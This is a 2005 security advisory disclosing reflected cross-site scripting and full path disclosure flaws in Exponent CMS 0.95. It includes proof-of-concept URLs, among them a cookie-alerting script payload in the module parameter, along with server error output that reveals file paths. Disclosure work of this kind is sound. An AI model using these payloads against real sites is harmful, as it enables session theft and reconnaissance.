ECHO_ADV_02$2004 --------------------------------------------------------------------------- Vulnerabilities in eXponent --------------------------------------------------------------------------- Author: y3dips Date: Januari, 25th 2005 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv010-y3dips-2005.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exponent Content Management System Exponent is an exciting new web-based content management system. It makes creating and maintaining websites easy for non-technical users, while providing site managers the power and flexibility to add new features, completely customize the layout, and delegate responsibilities to other users. by: James Hunt and the OIC Group http://www.exponentcms.org Version : - Stable version of 0.95 Exponent CMS. --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A. Cross-site scripting aka XSS: A1 - XSS through unsanitaized user submitted in module variable http://[SITE]/expo/index.php?action=view&id=2&module=

Tes

POC : http://[SITE]/expo/index.php?action=view&id=2&module=

Tes

A2. Session ID at module Variable http://[SITE]/endon/mod.php?action=[BLABLA]&module=[XSS] POC : http://[SITE]/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E B. Full Path disclosures Some scripts in subsystems directories are vulnerable against direct access and we will see standard php error messages revealing full path to script This vulnerable is because undeffined pathos_core_version variable , and the vulnerable files has the same format name (:)~) ---.info.---.php POC : http://localhost/expo/subsystems/search.info.php Fatal error: Call to undefined function: pathos_core_version() in /var/www/html/expo/subsystems/search.info.php on line 52 POC : http://localhost/expo/subsystems/permissions.info.php POC : http://localhost/expo/subsystems/security.info.php Fatal error: Call to undefined function: pathos_core_version() in /var/www/html/expo/subsystems/security.info.php on line 51 Fatal error: Call to undefined function: pathos_core_version() in /var/www/html/expo/subsystems/permissions.info.php on line 51 Another vulnerable path - http://localhost/expo/sdk/blanks/formcontrol.php - http://localhost/expo/sdk/blanks/file_modules.php --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32) ~ newbie_hacker@yahoogroups.com , ~ #e-c-h-o@DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ y3dips || echo|staff || y3dips[at]gmail[dot]com Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------